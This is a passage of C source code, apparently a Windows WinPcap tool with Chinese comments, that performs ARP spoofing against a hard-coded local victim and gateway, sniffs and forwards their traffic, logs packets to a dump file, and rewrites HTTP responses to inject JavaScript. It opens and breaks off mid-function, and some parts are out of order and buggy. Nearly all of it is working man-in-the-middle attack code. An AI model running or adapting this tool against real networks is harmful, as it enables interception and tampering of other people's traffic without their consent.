if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
{
printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
i ++;
}
// pTmp = pTmp->next;
//}
if (i>0) // 重新计算校验和
{
AnalyzePacket(pkt_data,pkt_len);
printf(" Done %d replacements, forwarding packet of size %d\n",
i, pkt_len);
ih->crc = 0;
th->th_sum = 0;
ih->crc = checksum((USHORT *)ih,sizeof(ip_header));
ComputeTcpPseudoHeaderChecksum(ih, th, (char *)datatcp, lentcp);
return;
}
else
{
// printf(" Forwarding untouched packet of size %d\n", pkt_len);
}
}
void ComputeTcpPseudoHeaderChecksum(ip_header *pIphdr, tcp_header *pTcphdr,
char *payload, int payloadlen)
{
char *buff = (char *) malloc(1024+payloadlen);
char *ptr=buff;
int chksumlen = 0;
ULONG zero = 0;
// 伪头
// 包含源IP地址和目的IP地址
memcpy(ptr, &pIphdr->ipSource, sizeof(pIphdr->ipSource));
ptr += sizeof(pIphdr->ipSource);
chksumlen += sizeof(pIphdr->ipSource);
memcpy(ptr, &pIphdr->ipDestination, sizeof(pIphdr->ipDestination));
ptr += sizeof(pIphdr->ipDestination);
chksumlen += sizeof(pIphdr->ipDestination);
// 包含8位0域
memcpy(ptr, &zero, 1);
ptr += 1;
chksumlen += 1;
// 协议
memcpy(ptr, &pIphdr->proto, sizeof(pIphdr->proto));
ptr += sizeof(pIphdr->proto);
chksumlen += sizeof(pIphdr->proto);
// TCP长度
USHORT tcp_len = htons(sizeof(tcp_header) + payloadlen);
memcpy(ptr, &tcp_len, sizeof(tcp_len));
ptr += sizeof(tcp_len);
chksumlen += sizeof(tcp_len);
// TCP头
memcpy(ptr, pTcphdr, sizeof(tcp_header));
ptr += sizeof(tcp_header);
chksumlen += sizeof(tcp_header);
// 净荷
memcpy(ptr, payload, payloadlen);
ptr += payloadlen;
chksumlen += payloadlen;
// 补齐到下一个16位边界
for(int i=0; i < payloadlen % 2; i++)
{
*ptr = 0;
ptr ++;
chksumlen ++;
}
// 计算这个校验和,将结果填充到TCP头
pTcphdr->th_sum = checksum((USHORT*) buff, chksumlen);
}
BOOL Replace(const void *in_block, const size_t block_size,
const char *szOld, const char *szNew)
{
size_t shift[256];
bool init = false;
return memreplace(in_block, block_size, szOld, strlen(szOld), szNew,
strlen(szNew), shift, &init);
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while (size >1) {
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if (size) cksum += *(UCHAR*) buffer;
cksum = (cksum >> 16) + (cksum&0xffff);
cksum += (cksum >> 16);
return (USHORT) (~cksum);
}
int memreplace(const void *in_block, /* 数据块 */
const size_t block_size, /* 数据块长度 */
const void *in_pattern, /* 需要查找的数据 */
const size_t pattern_size, /* 查找数据的长度 */
const void *in_newpattern, /* 要替换的新数据 */
const size_t newpattern_size, /* 要替换的新数据的长度 */
size_t * shift, /* 移位表,应该是256*size_t的数组 */
bool * init)
{ /* 是否需要初始化移位表 */
size_t byte_nbr, /* Distance through block */
match_size, /* Size of matched part */
limit;
const unsigned char *match_ptr = NULL;
const unsigned char *block = (unsigned char *) in_block, /* Concrete pointer to block data */
*pattern = (unsigned char *) in_pattern; /* Concrete pointer to search value */
if (block == NULL || pattern == NULL || shift == NULL)
return (NULL);
/* 查找的串长应该小于 数据长度*/
if (block_size < pattern_size)
return 0;
if (pattern_size == 0) /* 空串匹配第一个 */
{
memcpy((void *) (block), in_newpattern, newpattern_size); // 找到并开始替换
return 1;
}
/* 如果没有初始化,构造移位表*/
if (!init || !*init) {
for (byte_nbr = 0; byte_nbr < 256; byte_nbr++)
shift[byte_nbr] = pattern_size + 1;
for (byte_nbr = 0; byte_nbr < pattern_size; byte_nbr++)
shift[(unsigned char) pattern[byte_nbr]] = pattern_size - byte_nbr;
if (init)
*init = true;
}
/* 开始搜索数据块,每次前进移位表中的数量 */
limit = block_size - pattern_size + 1;
for (byte_nbr = 0; byte_nbr < limit; byte_nbr += shift[block[byte_nbr + pattern_size]]) {
if (block[byte_nbr] == *pattern) {
/*
* 如果第一个字节匹配,那么继续匹配剩下的
*/
match_ptr = block + byte_nbr + 1;
match_size = 1;
do {
if (match_size == pattern_size)
{
/* 找到并开始替换 */
memcpy((void *) (block + byte_nbr), in_newpattern, newpattern_size);
return 1;
}
} while (*match_ptr++ == pattern[match_size++]);
}
}
return 0;
}
unsigned int _stdcall SendPacketToGetAllActtiveIP_MAC(void *para)
{
unsigned long tip,subnetsta,subnetend;
static unsigned char sendbuf[60];
ethernet_head eth;
arp_head arp;
IP_MAC *myip = (IP_MAC*)para;
subnetsta=htonl(myip->ip&netmask); //计算内网ip起点
subnetend=htonl(htonl(subnetsta)|(~netmask)); //计算内网ip结束
memset(eth.dest_mac,0xFF,6);
memcpy(eth.source_mac,myip->mac, 6);
memcpy(arp.sour_addr,myip->mac, 6);
memset(arp.dest_addr,0, 6);
eth.eh_type=htons(0x0806);
arp.hardware_type=htons(0x0001);
arp.protocol_type=htons(0x0800);
arp.add_len=6;
arp.pro_len=4;
arp.option=htons(0x0001);
arp.sour_ip=myip->ip;
memset(arp.padding,0,18);
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
for(tip=subnetsta;tip<=subnetend-1;tip++)
{
arp.dest_ip=htonl(tip);
if(arp.dest_ip == myip->ip)
continue;
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(nicHandle,sendbuf,60)!=0)
{
printf("Getallactive ip PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
}
//memset(sendbuf,0,sizeof(sendbuf));
// free(sendbuf);
return 1;
}
unsigned int _stdcall ReceivePacketToGetAllActtiveIP_MAC(void *para)
{
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
pActtiveIP_MAC p,q;
q=new ActtiveIP_MAC;
memset(q, 0, sizeof(ActtiveIP_MAC));
int i;
IP_MAC myip = *(IP_MAC*)para;
while((pcap_next_ex(nicHandle,&pkt_header,(const u_char**)&pkt_data))>0)
{
//(u_long*)(pkt_data+38)==(u_long*)inet_addr("192.168.1.117"
if(*(unsigned short *)(pkt_data+12)==htons(0x0806)&&*(unsigned short *)(pkt_data+14)==htons(0x0001))
{
// arp_head *pd= (arp_head*)pkt_data;
p=new ActtiveIP_MAC;
memset(p, 0, sizeof(ActtiveIP_MAC));
p->next=NULL;
p->IP_MAC.ip=*(unsigned long*)(pkt_data+28);
for(i=0;i<6;i++)
{
p->IP_MAC.mac[i]=*(unsigned char*)(pkt_data+22+i);
}
if(pIP_MACHead==NULL)
{
pIP_MACHead=p;
q=p;
}
else
{
q->next=p;
q=p;
}
}
if(StopReceivePacket==1)
{
return 1;
}
}
return 1;
}
//
#include "stdafx.h"
#include "pcap.h"
#include <stdio.h>
#include<conio.h>
#include <packet32.h> //LPADAPTER
#include <WinSock2.h> //inet_ntoa
#include <Iphlpapi.h> //PIP_ADAPTER_INFO,
#include <process.h> //_beginthreadex,
#include <string>
#include <iostream>
#pragma comment(lib,"wsock32")
#pragma comment(lib,"wpcap")
#pragma comment(lib,"IPHlpApi")
#pragma comment(lib,"packet")
using namespace std;
typedef struct tagSTRLINK
{
char szOld[256];
char szNew[256];
struct tagSTRLINK *next;
}STRLINK, *PSTRLINK;
struct ether_header
{
u_int8_t ether_dhost[6]; /* destination eth addr */
u_int8_t ether_shost[6]; /* source ether addr */
u_int16_t ether_type; /* packet type ID field */
};
/* 4 bytes IP address */
typedef struct ip_address{
u_char byte1;
u_char byte2;
u_char byte3;
u_char byte4;
};
/* IPv4 header */
typedef struct ip_header{
u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits)
u_char tos; // Type of service
u_short tlen; // Total length
u_short identification; // Identification
u_short flags_fo; // Flags (3 bits) + Fragment offset (13 bits)
u_char ttl; // Time to live
u_char proto; // Protocol
u_short crc; // Header checksum
union {
unsigned int ipSource;
ip_address saddr; // Source address
};
union {
unsigned int ipDestination;
ip_address daddr; // Destination address
};
//u_int op_pad; // Option + Padding
};
/* UDP header*/
typedef struct udp_header{
u_short sport; // Source port
u_short dport; // Destination port
u_short len; // Datagram length
u_short crc; // Checksum
};
/*TCP Header*/
struct tcp_header
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
u_int32_t th_seq; /* sequence number */
u_int32_t th_ack; /* acknowledgement number */
u_int16_t th_len_resv_code; // Datagram length and reserved code
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};
struct ethernet_head
{
unsigned char dest_mac[6]; //目标主机MAC地址
unsigned char source_mac[6]; //源端MAC地址
unsigned short eh_type; //以太网类型
};
struct arp_head
{
unsigned short hardware_type; //硬件类型:以太网接口类型为1
unsigned short protocol_type; //协议类型:IP协议类型为0X0800
unsigned char add_len; //硬件地址长度:MAC地址长度为6B
unsigned char pro_len; //协议地址长度:IP地址长度为4B
unsigned short option; //操作:ARP请求为1,ARP应答为2
unsigned char sour_addr[6]; //源MAC地址:发送方的MAC地址
unsigned long sour_ip; //源IP地址:发送方的IP地址
unsigned char dest_addr[6]; //目的MAC地址:ARP请求中该字段没有意义;ARP响应中为接收方的MAC地址
unsigned long dest_ip; //目的IP地址:ARP请求中为请求解析的IP地址;ARP响应中为接收方的IP地址
unsigned char padding[18]; //数据
};
struct arp_packet //最终arp包结构
{
ethernet_head eth; //以太网头部
arp_head arp; //arp数据包头部
};
typedef struct ip_mac
{
u_long ip; //IP地址
unsigned char mac[6]; //MAC地址
}IP_MAC, *pIP_MAC;
typedef struct acttive_IP_MAC //用于存储ip与对应mac的结构
{
acttive_IP_MAC* next;
IP_MAC IP_MAC;
}ActtiveIP_MAC,*pActtiveIP_MAC;
typedef struct arp_cheat_data //传递给arp欺骗线程的数据
{
pIP_MAC getwip; //网关IP_MAC
pIP_MAC myip; //本机IP_MAC
int seq; //序号
}ArpCheatData, *pArpCheatData;
void HangUntilKeyboartHit();
void AnalyzePacket(const u_char *pkt_data, unsigned int pkt_len);
void ReplacePacket(const u_char *pkt_data, unsigned int pkt_len);
void ReplacePacket2(const u_char *pkt_data, unsigned int pkt_len);
unsigned int _stdcall sproof(void *para);
unsigned char* GetMacByName(char* pDevName);
int GetGatewayIP(pIP_MAC pIP_MAC, unsigned long choosedIP);
unsigned int _stdcall SendPacketToGetAllActtiveIP_MAC(void *para);
unsigned int _stdcall ReceivePacketToGetAllActtiveIP_MAC(void *para);
unsigned int _stdcall TransmitAndSniffer(void *para);
BOOL Replace(const void *in_block, const size_t block_size,
const char *szOld, const char *szNew);
int memreplace(const void *in_block, /* 数据块 */
const size_t block_size, /* 数据块长度 */
const void *in_pattern, /* 需要查找的数据 */
const size_t pattern_size, /* 查找数据的长度 */
const void *in_newpattern, /* 要替换的新数据 */
const size_t newpattern_size, /* 要替换的新数据的长度 */
size_t * shift, /* 移位表,应该是256*size_t的数组 */
bool * init);
USHORT checksum(USHORT *buffer, int size);
void ComputeTcpPseudoHeaderChecksum(ip_header *pIphdr, tcp_header *pTcphdr,
char *payload, int payloadlen);
pActtiveIP_MAC pIP_MACHead=NULL;
int StopReceivePacket=0; //用于控制接收ARP应答线程的标志,1表示终止线程
int cheat[256]; //用于控制欺骗线程的标志
int cheatOver[256]; //用于控制欺骗线程的标志
pcap_t *nicHandle; //保存打开的(已选择)网卡的指针
unsigned long netmask; //子网掩码
PSTRLINK strLink = (PSTRLINK) malloc(sizeof(STRLINK));
PSTRLINK strLink2 = (PSTRLINK) malloc(sizeof(STRLINK));
char errbuf[PCAP_ERRBUF_SIZE];
int main()
{
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0;
int maxActive = 0;
pcap_addr *address; //网卡地址
//sockaddr *addr = NULL;
sockaddr_in addr;
in_addr inputAddr;
IP_MAC myIP_MAC, //本机IP地址、MAC地址
fakeIP_MAC, //要伪装成的IP地址、MAC地址
gatewayIP_MAC; //网关IP地址、MAC地址
memset(&myIP_MAC, 0, sizeof(IP_MAC));
memset(&fakeIP_MAC, 0, sizeof(IP_MAC));
memset(&gatewayIP_MAC, 0, sizeof(IP_MAC));
memset(&inputAddr, 0, sizeof(in_addr));
if(pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* Print the list */
for(d=alldevs; d; d=d->next)
{
printf("%d %s",i++, d->name);
if (d->description)
printf(" (%s)\n", d->description);
else
printf(" (No description available)\n");
if(NULL != d->addresses)
{
//if(NULL == du) { du = d; } //后面将监视第一个可以的NIC
address = d->addresses;
if(NULL != address->addr)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->addr, sizeof(addr));
// printf(" address: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
if(NULL != address->netmask)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->netmask, sizeof(addr));
// printf(" netmask: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
if(NULL != address->broadaddr)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->broadaddr, sizeof(addr));
// printf(" broadcast: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
if(NULL != address->dstaddr)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->dstaddr, sizeof(addr));
// printf(" destaddr: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
}
}
if(i==0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}
printf("Enter the interface number (1-%d):",i);
scanf_s("%d", &inum,10);
if(inum < 1 || inum > i)
{
printf("\nInterface number out of range.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
/* Retrieve the device list */
/* Jump to the selected adapter */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the device */
/* Open the adapter */
if ((nicHandle= pcap_open_live(d->name, // name of the device
65536, // portion of the packet to capture.
// 65536 grants that the whole packet will be captured on all the MACs.
1, // promiscuous mode (nonzero means promiscuous)
1000, // read timeout
errbuf // error buffer
)) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
memcpy(myIP_MAC.mac, GetMacByName(d->name), 6);
printf(", MAC = %02X-%02X-%02X-%02X-%02X-%02X\n\n",
myIP_MAC.mac[0], myIP_MAC.mac[1], myIP_MAC.mac[2],
myIP_MAC.mac[3], myIP_MAC.mac[4], myIP_MAC.mac[5]);
printf("\nlistening on %s...\n", d->description);
char data[] = "00:0C:29:CA:0A:10";
unsigned int tmp[6];
unsigned char mc[6];
memset(mc, 0, sizeof(mc));
sscanf_s(data, "%2x:%2x:%2x:%2x:%2x:%2x", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5],50);
for (i = 0; i < 6; i++) {
mc[i] = (unsigned char)tmp[i];
}
printf("xnjmacis selected:= %02X-%02X-%02X-%02X-%02X-%02X ",mc[0],mc[1],mc[2],mc[3],mc[4],mc[5]);
/* At this point, we don't need any more the device list. Free it */
// HangUntilKeyboartHit();
for(address=d->addresses; address; address=address->next)
{
//得到用户选择的网卡的一个IP地址
myIP_MAC.ip = ((struct sockaddr_in *)address->addr)->sin_addr.s_addr;
//得到该IP地址对应的子网掩码
netmask = ((struct sockaddr_in *)(address->netmask))->sin_addr.S_un.S_addr;
if (!myIP_MAC.ip || !netmask)
{
continue;
}
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->addr, sizeof(addr));
printf(", IP = %s", inet_ntoa(addr.sin_addr));
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->netmask, sizeof(addr));
printf(", netmask = %s\n", inet_ntoa(addr.sin_addr));
break;
}
if (address == NULL)
{
printf("\nNo IP && netmask of selected NIC! Make sure NIC had been right seted.\n");
pcap_close(nicHandle);
pcap_freealldevs(alldevs);
HangUntilKeyboartHit();
return 1;
}
Sleep(200);
printf("\nScan net info, please wait...\n");
/* 获取网关的IP地址, MAC地址由扫描网关ARP应答包得到*/
if(GetGatewayIP(&gatewayIP_MAC, myIP_MAC.ip))
{
memset(&addr, 0, sizeof(addr));
addr.sin_addr.S_un.S_addr = gatewayIP_MAC.ip;
printf("\ngetway: IP = %s", inet_ntoa(addr.sin_addr));
}
printf("aaa");
/* 扫描局域网内活动主机*/
unsigned long sendArphd, recvArphd, transhd, sproofhd[256]; //用于线程控制的变量
unsigned sendArpId, recvArpId, transId, sproofId[256]; //用于线程控制的变量
//SendPacketToGetAllActtiveIP_MAC(&myIP_MAC);
// sendArphd = _beginthreadex(NULL, 0, SendPacketToGetAllActtiveIP_MAC, &myIP_MAC, 0, &sendArpId); //开启arp扫描包线程
// recvArphd = _beginthreadex(NULL, 0, ReceivePacketToGetAllActtiveIP_MAC, &myIP_MAC, 0, &recvArpId); //开启接收arp响应包线程
// WaitForSingleObject((HANDLE)sendArphd, INFINITE); //主线程停止等待发送线程结束
//
//// Sleep(10000);
// unsigned long tick = GetTickCount();
// printf(" ");
// while(GetTickCount() - tick < 3000) //等待回应包到达,共等待3s
// {
// printf("\b\b\");
// Sleep(10);
// printf("\b\b\");
// Sleep(10);
// printf("\b\b|");
// Sleep(10);
// printf("\b\b|");
// Sleep(10);
// printf("\b\b/");
// Sleep(10);
// printf("\b\b/");
// Sleep(10);
// printf("\b\b-");
// Sleep(10);
// printf("\b\b-");
// Sleep(10);
// }
// printf("\b\b\b");
// printf("\b\b\b");
// Sleep(1000);
// StopReceivePacket = 1;//置标志,停止接收线程ReceivePacketToGetAllActtiveIP_MAC
// WaitForSingleObject((HANDLE)recvArphd, INFINITE); //主线程停止等待接收线程结束
// if(pIP_MACHead != NULL)
// {
// /*过滤,删除重复的活动主机IP_MAC*/
// pActtiveIP_MAC z, k, j;
// /* for(k=pIP_MACHead;k->next!=NULL;k=k->next)
// {
// for(z=k;z->next!=NULL;)
// {
// if((k->IP_MAC.ip == z->next->IP_MAC.ip)
// &&(memcmp(k->IP_MAC.mac, z->next->IP_MAC.mac, 6)==0))
// {
// j = z->next;
// z->next = j->next;
// delete j;
// j = NULL;
// }
// else
// {
// z = z->next;
// }
// }
// }*/
//
// /*获取网关的信息*/
// /*if(pIP_MACHead->IP_MAC.ip == gatewayIP_MAC.ip)
// {
// memcpy(gatewayIP_MAC.mac, pIP_MACHead->IP_MAC.mac, 6);
// printf(", MAC = %02X-%02X-%02X-%02X-%02X-%02X\n\n",
// gatewayIP_MAC.mac[0], gatewayIP_MAC.mac[1], gatewayIP_MAC.mac[2],
// gatewayIP_MAC.mac[3], gatewayIP_MAC.mac[4], gatewayIP_MAC.mac[5]);
// j = pIP_MACHead;
// pIP_MACHead = pIP_MACHead->next;
// delete j;
// j = NULL;
// }
// else
// {
// for(k = pIP_MACHead; k->next != NULL; k = k->next)
// {
// if(k->next->IP_MAC.ip == gatewayIP_MAC.ip)
// {
// memcpy(gatewayIP_MAC.mac, k->next->IP_MAC.mac, 6);
// printf(", MAC = %02X-%02X-%02X-%02X-%02X-%02X\n\n", gatewayIP_MAC.mac[0],
// gatewayIP_MAC.mac[1], gatewayIP_MAC.mac[2], gatewayIP_MAC.mac[3],
// gatewayIP_MAC.mac[4], gatewayIP_MAC.mac[5]);
// j = k->next;
// k->next = j->next;
// delete j;
// j = NULL;
// break;
// }
// }
// }
// */
// /*输出列表*/
// for(z = pIP_MACHead,i = 1; z != NULL; z = z->next, i++)
// {
// memset(&addr, 0, sizeof(addr));
// addr.sin_addr.S_un.S_addr = z->IP_MAC.ip;
// printf("%-3d IP = %-20s MAC = %02X-%02X-%02X-%02X-%02X-%02X\n",
// i, inet_ntoa(addr.sin_addr), z->IP_MAC.mac[0], z->IP_MAC.mac[1],
// z->IP_MAC.mac[2], z->IP_MAC.mac[3], z->IP_MAC.mac[4], z->IP_MAC.mac[5]);
// }
// // maxActive = i - 1;
// }
// else
// {
// printf(" Get nothing, please check you net.\n");
// }
/*CloseHandle((HANDLE)sendArphd);
CloseHandle((HANDLE)recvArphd);*/
Sleep(200);
//"p";
// char *od="<div>";
char od[256]="type=\"text/javascript\">";
char od2[256]="type='text/javascript'>";
// char *od2="text/javascript'></script>";
//char *od="script>";
// char *od2="text/javascript'></script>";
//char *od2="(t>";
strcpy_s(strLink->szOld,od);
strLink->szOld[strlen(od)-1] = '\0';
//string sta="<script type='text/javascript'>alert('smf');windows.location.href='www.163.com';</scrippt>sss";
// string sta=">alert('a')";
// string sta=";
//char *mf="<gif>";
//alert('aaa');";
//char *mf=(char *)sta.c_str();
char mf[256]=">alert('hffscriptstrl')";
//strcpy_s(*mf,sta);
strcpy_s(strLink->szNew,mf);
strLink->szOld[strlen(mf)-1] = '\0';
/*string so;
for (int i = 0; i < 20; i++)
{
so+=mf[i];
}
cout<<so<<endl;*/
//memset(cheat, 0, 256);
strLink->next = (PSTRLINK) malloc(sizeof(STRLINK));
strcpy_s(strLink->next->szOld,od2);
strLink->next->szOld[strlen(od2)-1] = '\0';
char mf2[256]=">alert('hfbscriptstrl')";
//strcpy_s(*mf,sta);
strcpy_s(strLink->next->szNew,mf2);
strLink->next->szOld[strlen(mf2)-1] = '\0';
strLink->next->next=NULL;
/*strcpy_s(strLink2->szOld,od2);
char mf2[7]="('ss')";
strcpy_s(strLink2->szNew,mf2);
strLink2->szOld[strlen(mf2)-1] = '\0';*/
ArpCheatData ArpCheatData;
ArpCheatData.getwip = &gatewayIP_MAC;
ArpCheatData.myip = &myIP_MAC;
transhd = _beginthreadex(NULL, 0, TransmitAndSniffer, &ArpCheatData, 0, &transId); //开启转发线程
transhd = _beginthreadex(NULL, 0, sproof, &ArpCheatData, 0, &transId);
Sleep(5000000);
HangUntilKeyboartHit();
pcap_freealldevs(alldevs);
return 0;
}
int GetGatewayIP(pIP_MAC pIP_MAC, unsigned long choosedIP)
{
PIP_ADAPTER_INFO pAdapterInfo = NULL;
PIP_ADAPTER_INFO pAdapter = NULL;
DWORD dwRetVal = 0;;
pAdapterInfo = (IP_ADAPTER_INFO *) malloc( sizeof(IP_ADAPTER_INFO) );
unsigned long ulOutBufLen = sizeof(IP_ADAPTER_INFO);
// Make an initial call to GetAdaptersInfo to get
// the necessary size into the ulOutBufLen variable
if (GetAdaptersInfo( pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
{
free(pAdapterInfo);
pAdapterInfo = (IP_ADAPTER_INFO *) malloc (ulOutBufLen);
}
if ((dwRetVal = GetAdaptersInfo( pAdapterInfo, &ulOutBufLen)) == NO_ERROR)
{
pAdapter = pAdapterInfo;
while (pAdapter)
{
if(choosedIP==inet_addr(pAdapter->IpAddressList.IpAddress.String))
{
pIP_MAC->ip=inet_addr(pAdapter->GatewayList.IpAddress.String);
return 1;
}
printf("\t***\n");
pAdapter = pAdapter->Next;
}
}
return 0;
}
unsigned char* GetMacByName(char* pDevName)
{
static u_char mac[6];
memset(mac,0,sizeof(mac));
LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
return NULL;
}
PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));
if (OidData == NULL)
{
PacketCloseAdapter(lpAdapter);
return NULL;
}
//
// Retrieve the adapter MAC querying the NIC driver
//
OidData->Oid = OID_802_3_CURRENT_ADDRESS;
OidData->Length = 6;
memset(OidData->Data, 0, 6);
BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
if(Status)
{
memcpy(mac,(u_char*)(OidData->Data),6);
}
free(OidData);
PacketCloseAdapter(lpAdapter);
return mac;
}
void HangUntilKeyboartHit()
{
printf("\nPress any key to continue.");
while (!_kbhit()) { /* do nothing */ };
}
unsigned int _stdcall sproof(void *para)
{
pArpCheatData parpcheatData = (pArpCheatData)para;
int j;
unsigned char sendbuftogate[60],sendbuftosp[60],rsendbuftogate[60],rsendbuftosp[60];
//pActtiveIP_MAC spip;
ethernet_head eth;
arp_head arp;
int k;
//for(spip=pIP_MACHead,j=0;j<parpcheatData->seq-1;spip=spip->next,j++);
in_addr addr;
addr.S_un.S_addr = inet_addr("192.168.1.115");
u_long sdr=inet_addr("192.168.1.115");
char data[] = "00:0C:29:CA:0A:10";
unsigned int tmp[6];
unsigned char mc[6];
memset(mc, 0, sizeof(mc));
sscanf_s(data, "%2x:%2x:%2x:%2x:%2x:%2x", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5],50);
int i=0;
for (i = 0; i < 6; i++) {
mc[i] = (unsigned char)tmp[i];
}
memcpy(eth.dest_mac,parpcheatData->getwip->mac,6);
memcpy(eth.source_mac,parpcheatData->myip->mac, 6);
memcpy(arp.sour_addr,parpcheatData->myip->mac, 6);
memcpy(arp.dest_addr,parpcheatData->getwip->mac, 6);
eth.eh_type=htons(0x0806);
arp.hardware_type=htons(0x0001);
arp.protocol_type=htons(0x0800);
arp.add_len=6;
arp.pro_len=4;
arp.option=htons(0x0002);
arp.sour_ip=sdr;
arp.dest_ip=parpcheatData->getwip->ip;
memset(arp.padding,0,18);
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,ð,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
memcpy(eth.dest_mac,mc,6);
memcpy(eth.source_mac,parpcheatData->myip->mac, 6);
memcpy(arp.sour_addr,parpcheatData->myip->mac, 6);
memcpy(arp.dest_addr,mc, 6);
arp.sour_ip=parpcheatData->getwip->ip;
arp.dest_ip=sdr;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,ð,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
memcpy(eth.dest_mac,mc,6);
memcpy(eth.source_mac,parpcheatData->getwip->mac, 6);
memcpy(arp.sour_addr,parpcheatData->getwip->mac, 6);
memcpy(arp.dest_addr,mc, 6);
arp.sour_ip=parpcheatData->getwip->ip;
arp.dest_ip=sdr;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,ð,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
memcpy(eth.dest_mac,parpcheatData->getwip->mac,6);
memcpy(eth.source_mac,mc, 6);
memcpy(arp.sour_addr,mc, 6);
memcpy(arp.dest_addr,parpcheatData->getwip->mac, 6);
arp.sour_ip=sdr;
arp.dest_ip=parpcheatData->getwip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,ð,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
// printf("begin cheat seq = %d\n",parpcheatData->seq);
while(TRUE)
{
//首先检查是否取消了欺骗
if(pcap_sendpacket(nicHandle,sendbuftogate,60)!=0)
{
printf("sendbuftogate Error: %d\n",GetLastError());
return 0;
}
if(pcap_sendpacket(nicHandle,sendbuftosp,60)!=0)
{
printf("sendbuftosp Error: %d\n",GetLastError());
return 0;
}
Sleep(500);
}
}
void AnalyzePacket(const u_char *pkt_data, unsigned int pkt_len)
{
ether_header *eh = (ether_header*)pkt_data;
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
ip_header *ih = (ip_header*)(pkt_data+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
int ip_len = ntohs(ih->tlen);//ip_len = ip_body + ip_header
// bool find_http =false;
// CString http_txt = "";
bool find_http = true;
string http_txt = "";
size_t ip_header_len = (ih->ver_ihl & 0xf) * 4;
tcp_header* th = (tcp_header *) ((u_char*)ih + ip_header_len);
ip_len=ip_len-ip_header_len;
char* ip_pkt_data = (char*)th;
if (ntohs(th->th_dport)==80||ntohs(th->th_sport)==80)
{
for(int im=0;im<ip_len;++im)
{
// printf("ishttppacket");
char* sr="<script type='text/javascript'>alert('aaa')<scrippt>";
if(!find_http&&(im+strlen("text/html")<ip_len) &&strncmp(ip_pkt_data+im,"text/html",strlen("text/html"))==0)
{
// char* py= strstr(ip_pkt_data,"</head>");
find_http = true;
// memset(sendbuf+20+im,0x80,1600-20-im);
}
/*if(find_http )
{
http_txt+=ip_pkt_data[im];
}*/
}
if(find_http )
{
for(int imc=100;imc< pkt_len;++imc )
http_txt+=ip_pkt_data[imc];
}
}
if(http_txt != ""){
cout<<http_txt;
cout<<endl<<"***********************************************************"<<endl<<endl;
}
}
}
}
unsigned int _stdcall TransmitAndSniffer(void *para)
{
pArpCheatData parpcheatData = (pArpCheatData)para;
struct changemac
{
unsigned char mac[12];
};
unsigned char bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned char sendbuf[1600];
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
changemac *cmac,*togatewaymac;
pActtiveIP_MAC z;
int i,j;
char data[] = "00:0C:29:CA:0A:10";
unsigned int tmp[6];
unsigned char mc[6];
memset(mc, 0, sizeof(mc));
sscanf_s(data, "%2x:%2x:%2x:%2x:%2x:%2x", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5],50);
for (i = 0; i < 6; i++) {
mc[i] = (unsigned char)tmp[i];
}
cmac=new changemac;
togatewaymac=new changemac;
memcpy(togatewaymac->mac,parpcheatData->getwip->mac,6);
memcpy(togatewaymac->mac+6,parpcheatData->myip->mac,6);
pcap_dumper_t *dumpfile = pcap_dump_open(nicHandle, "dumpfile.txt");
while(true)
{
j=pcap_next_ex(nicHandle,&pkt_header,(const u_char**)&pkt_data);
if(j==0)
{
continue;
}
//memset(sendbuf,0,pkt_header->len);
//=(char)malloc();
if(*(unsigned short *)(pkt_data+12)==htons(0x0800)
